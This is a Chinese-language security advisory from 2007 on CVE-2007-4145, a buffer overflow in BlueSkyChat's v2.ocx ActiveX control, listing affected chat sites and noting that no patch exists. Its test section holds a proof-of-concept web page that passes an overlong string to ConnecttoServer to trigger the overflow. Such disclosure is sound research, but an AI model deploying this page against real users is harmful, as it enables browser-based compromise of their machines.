发布日期：2007-07-31
更新日期：2007-07-31

受影响系统：

bluesky BlueSkyChat 8.1.2.0

描述：

---

BUGTRAQ  ID: 25149
CVE(CAN) ID: CVE-2007-4145

是一种可视频语音的聊天软件。

BlueSkyChat所带的ActiveX控件的实现上存在缓冲区溢出，远程攻击者可能利用此漏洞控制用户系统。

ActiveX控件（v2.ocx）的com.ConnecttoServer调用在处理超长参数时存在缓冲区溢出问题，远程攻击者可能通过诱使用户访问恶意网页触发溢出执行任意指令。

目前已知如下集成了BlueSkyChat的软件受影响：

bliao          http://www.bliao.com
qqliao          http://www.qqliao.com
7liao          http://www.7liao.com
haoliao          http://www.haoliao.net
51liao          http://chat[.]51liao[.]net
heshang          http://www.heshang.net
xicn          http://vchat.xicn.net
CN104          http://www.cn104.com
liao-tian     http://www.liao-tian.com
aliao          http://www.aliao.net
kuailiao      http://www.kuailiao.com
mtliao          http://www.mtliao.com
pj0427          http://www.pj0427.com
uighur          http://chat.uighur.cn
wmliao          http://www.wmliao.com

<*链接：http://marc.info/?l=bugtraq&m=118589523611155&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">

function ClickForRunCalc()
{
     var heapSprayToAddress = 0x0d0d0d0d;

     var payLoadCode = "A" ;
     while (payLoadCode.length <= 10000) payLoadCode+='A';
     com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>

建议：

---

厂商补丁：

bluesky
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.bluesky.cn/

浏览次数：3503
严重程度：0（网友投票）